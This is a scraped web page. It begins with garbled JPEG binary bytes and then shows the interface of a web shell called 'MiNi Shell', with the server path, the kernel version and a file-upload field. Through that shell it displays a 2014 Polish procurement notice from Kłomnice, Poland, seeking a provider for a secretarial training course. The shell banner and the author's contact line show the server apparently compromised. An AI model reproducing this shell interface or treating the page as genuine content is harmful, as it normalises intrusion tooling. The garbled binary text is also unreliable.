JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140102/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140102/395-N-2014.html

<p class="kh_header"><b>Kłomnice: Przeprowadzenie cyklu szkoleniowego w zakresie Nowoczesny i kompetentny sekretariat w ramach projektu pn. Innowacyjna oświ@ta kapitałem gminy Kłomnice</b><br>
<b>Numer ogłoszenia: 395 - 2014; data zamieszczenia: 02.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Ekonomiczno-Administracyjny Szkół w gminie Kłomnice , ul. Strażacka 20, 42-270 Kłomnice, woj. śląskie, tel. 34 366 84 09, faks 34 366 84 09.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie cyklu szkoleniowego w zakresie Nowoczesny i kompetentny sekretariat w ramach projektu pn. Innowacyjna oświ@ta kapitałem gminy Kłomnice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie cyklu szkoleniowego z zakresu Nowoczesny i kompetentny sekretariat w ramach projektu POKL pn. Innowacyjna oświ@ta kapitałem gminy Kłomnice realizowanego przez Gminę Kłomnice - Zespół Ekonomiczno-Administracyjny Szkół w Gminie Kłomnice w ramach Priorytetu IX - Rozwój wykształcenia i kompetencji w regionach, Działania 9. 4. Wysoko wykwalifikowane kadry systemu oświaty - projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
1. Przeprowadzenie szkoleń dla pracowników administracji oświatowej z zakresu Nowoczesny i kompetentny sekretariat
Uszczegółowienie
1/ szkolenie przeprowadzone winno być dla 1 grupy liczącej do 10 osób w wymiarze 56 godzin szkoleniowych (w przypadku zwiększenia zainteresowania cyklem szkoleniowym Zamawiający zapewnia sobie możliwość rozszerzenia liczebności grupy do 11 osób). 
2/ miejsce przeprowadzenia szkoleń - sale szkoleniowe w placówkach oświatowych funkcjonujących na terenie gminy Kłomnice, wskazane przez Zamawiającego na co najmniej 3 dni przed zaplanowanym dniem szkolenia.
3/ Terminy szkoleń (S 1): 8, 9, 22 i 23 lutego oraz 8, 9, 22 i 23 marca 2014 roku. Terminy szkoleń każdorazowo dotyczą weekendów.
Wyżej wymienione terminy mogą ulec zmianie na wniosek Zamawiającego lub Wykonawcy po uzgodnieniu między stronami.
Dzienna liczba godzin ustalona zostaje na 7 godzin dydaktycznej dziennie (56 godzin / 8 dni = 7 godzin)
4/ Tematyka szkoleń winna obejmować następujące zagadnienia (minimalny zakres):
Dzień 1 - wykład, dyskusja, praca przy komputerze
1. Podstawowe zadania sekretariatu w placówce oświatowej,
2. Stosowanie przepisów kodeksu postępowania administracyjnego,
3. Wykorzystanie różnorodnych form komunikacji elektronicznej w pracy sekretariatu,
4. Podstawy prowadzenia dokumentacji kadrowej, pracowniczej, osobowej (w tym terminy szkoleń bhp, badań lekarskich).
Dzień 2 - wykład, dyskusja
1. Obieg dokumentów w placówce oświatowej,
2. Prowadzenie dokumentacji szkolnej i uczniowskiej,
3. Prowadzenie dokumentacji szkoły i dokumentacji szkolnej,
4. Prowadzenie metryki akt załatwianych spraw, przyjmowanie, rejestrowanie i rozpatrywanie skarg i wniosków, oraz wydawanie zaświadczeń, odpisów i kopii,
5. Zasady wydawania odpisów arkusza ocen,
6. Dokumentacja uczniowska - zmiany w przepisach prawa oświatowego,
7. Prowadzenie dokumentacji szkolnej w wersji elektronicznej - nowe regulacje prawne - możliwości zastosowania aplikacji elektronicznych w pracy sekretariatu,
8. Obowiązek szkolny i obowiązek nauki.
Dzień 3 - wykład, dyskusja
1. Prowadzenia kancelarii, ewidencja dokumentów, prowadzenie archiwum szkolnego,
2. Systemy kancelaryjne (instrukcja kancelaryjna i likwidacja dokumentów),
3. Kontrola wewnętrzna druków ścisłego zarachowania w szkole,
4. Zasady prowadzenia spraw kancelaryjnych; korespondencja biurowa - zewnętrzna 
i wewnętrzna, obieg dokumentów, dokumentacja tajna i poufna,
5. Rejestr pieczęci firmowych i pieczęci urzędowych,
6. Gromadzenie i zabezpieczanie przed zniszczeniem dokumentacji szkolnej,
7. Możliwości stosowania elektronicznych aplikacji wspomagających pracę sekretariatu.
Dzień 4 - Zamówienia publiczne - wykład, dyskusja, ćwiczenia z wykorzystaniem druków
1. Prawo zamówień publicznych (w tym w oparciu o prawo lokalne),
2. Podstawowe zasady udzielania zamówień,
3. Przygotowanie dokumentacji zamówień do 14.000 euro (w oparciu o prawo lokalne),
4. Kryteria wyboru wykonawcy i ograniczanie konkurencji,
5. Obowiązek sprawozdawczy placówek oświatowych,
6. Wypełnianie przykładowych formularzy sprawozdania,
7. Jak ustrzec się błędów w dokumentach i toku postępowania.
Dzień 5 - wykład, dyskusja
1. Ochrona danych osobowych
2. Dane i informacje (dane i informacje jako aktywa; dane osobowe jako szczególny rodzaj danych),
3. Zasady przetwarzania danych osobowych (podstawowe pojęcia; podstawy prawne przetwarzania danych; dane wrażliwe; zasady celowości, czasowości, adekwatności 
i merytorycznej poprawności; udostępniania danych),
4. Dane osobowe na dokumentach papierowych - przetwarzanie tradycyjne (praca z dokumentami papierowymi i ich zabezpieczanie, usuwanie danych w przypadku dokumentów papierowych, dobre praktyki),
5. Dane osobowe w systemach informatycznych - przetwarzanie elektroniczne (podstawowe zasady bezpieczeństwa pracy z komputerem; nośniki danych i ich cechy, kopie zapasowe; zasady posługiwania się hasłami i sposoby ich tworzenia; dobre praktyki),
6. Odpowiedzialność pracownika administracji szkoły w zakresie przepisów o ochronie danych osobowych.
Dzień 6 - MS Word - pokaz, ćwiczenia przy komputerze
1. Podstawowe zasady pracy z dokumentami,
2. Organizacja informacji w dokumencie,
3. Formatowanie tekstu,
4. Wstawianie elementów graficznych,
5. Tabele,
6. Formularze
Dzień 7 - MS Excel - pokaz, ćwiczenia przy komputerze
1. Wprowadzanie i formatowanie danych,
2. Wykonywanie obliczeń,
3. Dostosowanie widoku,
4. Wykresy,
5. Formuły,
6. Drukowanie arkuszy.
Dzień 8 - MS Office - pokaz, ćwiczenia przy komputerze
1. MS Outlook (kontakty, tworzenie i odbieranie wiadomości e-mail),
2. Wspólne funkcje word i excel (korespondencja seryjna, tabele przestawne),
3. Wykorzystanie pakietu MS Office w pracy sekretariatu.
5/ Po przeprowadzonym cyklu szkoleniowym wydane zostaną uczestnikom stosowne imienne zaświadczenia, przygotowane przez Zamawiającego w porozumieniu z Wykonawcą (podpisane przez obydwie strony).
6/ Szkolenia winne być prowadzone przez osoby posiadające stosowną wiedzę, umiejętności oraz uprawnienia umożliwiające prawidłowe zrealizowanie przedmiotu zamówienia.
7/ Wykonawca na co najmniej 7 dni przed rozpoczęciem cyklu szkoleniowego dla danej grupy przedstawi harmonogram tematyczny zajęć wraz z informacją dotyczącą wymagań w stosunku do wyposażenia sali szkoleniowej (rzutnik multimedialny, tablica interaktywna, zestawy komputerowe dla uczestników)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków zawartych w art.22 ust.1 i art.23 ustawy PZP oraz nie podlegania wykluczeniu z postępowania zgodnie z art. 24 ust.1 i 2 ustawy PZP - załącznik nr 2 do SIWZ wraz z odpowiednimi dokumentami uzupełniającymi,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków zawartych w art.22 ust.1 i art.23 ustawy PZP oraz nie podlegania wykluczeniu z postępowania zgodnie z art. 24 ust.1 i 2 ustawy PZP - załącznik nr 2 do SIWZ wraz z odpowiednimi dokumentami uzupełniającymi,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków zawartych w art.22 ust.1 i art.23 ustawy PZP oraz nie podlegania wykluczeniu z postępowania zgodnie z art. 24 ust.1 i 2 ustawy PZP - załącznik nr 2 do SIWZ wraz z odpowiednimi dokumentami uzupełniającymi</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków zawartych w art.22 ust.1 i art.23 ustawy PZP oraz nie podlegania wykluczeniu z postępowania zgodnie z art. 24 ust.1 i 2 ustawy PZP - załącznik nr 2 do SIWZ wraz z odpowiednimi dokumentami uzupełniającymi</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków zawartych w art.22 ust.1 i art.23 ustawy PZP oraz nie podlegania wykluczeniu z postępowania zgodnie z art. 24 ust.1 i 2 ustawy PZP - załącznik nr 2 do SIWZ wraz z odpowiednimi dokumentami uzupełniającymi, Oświadczenie o niezaleganiu w opłacaniu składek ZUS i podatków - załącznik nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">akredytacja zgodnie z Rozporządzeniem Ministra Edukacji Narodowej w sprawie akredytacji placówek doskonalenia nauczycieli oraz certyfikat jakości usług szkoleniowych</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o zaakceptowaniu przyszłej umowy - załącznik nr 4 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.klomnice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Ekonomiczno-Administracyjny Szkół w gminie Kłomnice, ul. Strażacka 20, 42-270 Kłomnice, pok. nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.01.2014 godzina 10:00, miejsce: Zespół Ekonomiczno-Administracyjny Szkół w gminie Kłomnice, ul. Strażacka 20, 42-270 Kłomnice, pok. nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt POKL projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego pn. Innowacyjna oświ@ta kapitałem gminy Kłomnice realizowany przez Gminę Kłomnice/Zespół Ekonomiczno-Administracyjny Szkół w Gminie Kłomnice w ramach Priorytetu IX - Rozwój wykształcenia i kompetencji w regionach, Działania 9. 4. Wysoko wykwalifikowane kadry systemu oświaty.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com